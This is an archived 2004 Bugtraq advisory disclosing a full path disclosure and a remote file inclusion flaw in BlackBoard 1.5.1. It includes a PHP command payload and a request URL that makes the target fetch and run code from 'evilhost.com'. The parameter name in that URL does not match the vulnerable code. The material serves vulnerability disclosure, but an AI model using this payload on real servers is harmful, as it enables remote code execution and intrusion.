| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 6 Oct 2004 10:56:43 -0000
From: Lin Xiaofeng <Cracklove@...il.Com>
To: bugtraq@...urityfocus.com
Subject: Multiple vulnerabilities in BlackBoard
Multiple vulnerabilities in BlackBoard
**********************************
*AuThor:Cracklove *
*emA!l:Cracklove[at]Gmail[dot]Com*
*HoMePaGe:http://ProxySky.com *
**********************************
[Info]
Website: http://blackboard.unclassified.de
Version: 1.5.1,Maybe prior
Problem: Full path disclosure,Include file
[Vuls]
1.Full path disclosure:
Let's try to request like this:
http://target/bb_lib/checkdb.inc.php
and we get standard error messages like that:
Warning: main(lang/_more.php): failed to open stream: No such file or directory in /www/web002/_blackboard/bb_lib/checkdb.inc.php on line 15
Fatal error: main(): Failed opening required 'lang/_more.php' (include_path='.:/usr/local/lib/php') in /www/web002/_blackboard/bb_lib/checkdb.inc.php on line 15
The Problem also in admin.inc.php,cp.inc.php etc.
2.Include file
Ok let's open ./bb_lib/admin.inc.php,We see
require($libpath . 'lang/' . $LANG . '_more.php');
Bingo!It is include vul!
[Exploit]
For example, if I had access to place files in a webspace http://evilhost.com/,I would create a directory "lang" and place
inside it a script called _more.php with content like the following:
<?
system("uname -a;id;ls -al");
?>
If we then make a request to the target machine like the following:
http://target/bb_lib/checkdb.inc.php?libpach=http://evilhost.com/
The code should be retrieved and executed.
[Fix]
Maybe a patch will release later.
[Greetings]
Greets To Xon,fatb,Envymask,h886,ToToDoDo And to all people in China.
Powered by blists - more mailing lists